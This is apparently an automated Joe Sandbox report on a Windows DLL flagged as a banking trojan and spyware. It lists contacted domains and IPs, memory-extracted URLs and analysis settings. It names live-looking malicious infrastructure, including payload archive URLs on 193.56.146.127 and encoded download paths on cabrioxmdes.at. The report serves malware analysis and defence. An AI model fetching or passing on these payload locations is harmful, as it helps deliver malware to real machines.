                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://curlmyip.net0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:0%Avira URL Cloudsafe
                      http://ns.adobp/0%Avira URL Cloudsafe
                      http://193.56.146.127/stilak32.rar100%Avira URL Cloudmalware
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif100%Avira URL Cloudmalware
                      http://ns.adobe.cmg0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://193.56.146.127/stilak64.rar100%Avira URL Cloudmalware
                      http://crl.osofts/Microt00%URL Reputationsafe
                      http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk0%Avira URL Cloudsafe
                      http://193.56.146.127/cook32.rar100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk0%Avira URL Cloudsafe
                      http://ns.adobe.ux0%Avira URL Cloudsafe
                      http://193.56.146.127/cook64.rar100%Avira URL Cloudmalware
                      http://ns.micro/10%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrue
                        		unknown
                        cabrioxmdes.at
                        		116.121.62.237
                        		truetrue
                          		unknown
                          myip.opendns.com
                          		102.129.143.40
                          		truefalse
                            		high
                            resolver1.opendns.com
                            		208.67.222.222
                            		truefalse
                              		high
                              gamexperts.net
                              		unknown
                              		unknowntrue
                                		unknown
                                1.0.0.127.in-addr.arpa
                                		unknown
                                		unknowntrue
                                  		unknown
                                  222.222.67.208.in-addr.arpa
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    8.8.8.8.in-addr.arpa
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://193.56.146.127/stilak32.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.giftrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://193.56.146.127/stilak64.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://193.56.146.127/cook32.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://193.56.146.127/cook64.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.disneyplus.com/legal/your-california-privacy-rightsRuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://curlmyip.netRuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://ns.adobp/RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://ns.adobe.cmgRuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.tiktok.com/legal/report/feedbackRuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.osofts/Microt0powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://twitter.com/spotifyRuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.hotspotshield.com/RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.disneyplus.com/legal/privacy-policyRuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ipinfo.io/ipRuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.hotspotshield.com/terms/RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.pango.co/privacyRuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://disneyplus.com/legal.RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ns.adobe.uxRuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ns.micro/1RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://help.disneyplus.com.RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        193.56.146.127
                                                        		unknownunknown
                                                        		10753LVLT-10753UStrue
                                                        116.121.62.237
                                                        		cabrioxmdes.atKorea Republic of
                                                        		9578CJNET-ASCheiljedangCoIncKRtrue
                                                        185.189.151.28
                                                        		unknownSwitzerland
                                                        		51395AS-SOFTPLUSCHtrue

                                                        Private

                                                        IP
                                                        192.168.2.1

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:620323
                                                        Start date and time: 04/05/202216:17:342022-05-04 16:17:34 +02:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 22s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:2oCOO5LbPu.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:48
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:4
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HDC Information:
                                                        • Successful, ratio: 20.6% (good quality ratio 19.7%)
                                                        • Quality average: 82.2%
                                                        • Quality standard deviation: 27%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Override analysis time to 240s for rundll32

                                                        Warnings

                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                        • TCP Packets have been reduced to 100
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 13.107.43.16
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 6576 because there are no executed function
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: 2oCOO5LbPu.dll

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        16:19:30API Interceptor33x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASNs

                                                        No context

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):3.964980110923723
                                                        Encrypted:false
                                                        SSDEEP:3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
                                                        MD5:99BDE3452748E34D6C50275110A6A8D4
                                                        SHA1:E79CB2A8DB7D8490523529D3861F95BA73A20C23
                                                        SHA-256:D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
                                                        SHA-512:19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
                                                        Malicious:false
                                                        Preview:Cookies are no longer stored in files. Please use Internet*Cookie* APIs to access cookies.

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
